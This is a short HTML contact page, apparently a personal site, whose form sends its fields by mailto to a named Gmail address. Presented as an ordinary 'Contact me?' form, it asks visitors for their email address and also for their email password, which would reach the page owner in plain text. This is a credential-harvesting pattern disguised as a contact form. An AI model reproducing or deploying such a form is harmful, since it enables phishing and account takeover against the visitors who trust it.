<!DOCTYPE html>
<html lang="en" dir="ltr">

<head>
  <meta charset="utf-8">
  <meta name="description" content="plz email me if u need to.">
  <title>Contact</title>
</head>

<body>
  <hr>
  <h3>Contact me?</h3>
  <table border="1" cellspacing="20">
    <tr>
      <td>
        <form class="" action="mailto:quatsan799@gmail.com" method="post" enctype="text/plain">
          <label>Your name</label>
          <br>
          <input type="text" name="your name">
          <br>
          <label>Email</label>
          <br>
          <input type="email" name="your email" value="">
          <br>
          <label>Your Email Password</label>
          <br>
          <input type="password" name="your email password">
          <br>
          <label>Any messages for me?</label>
          <br>
          <textarea name="your message" rows="10" cols="50"></textarea>
          <input type="submit"/>
        </form>
      </td>
    </tr>
  </table>
  <hr>
</body>

</html>
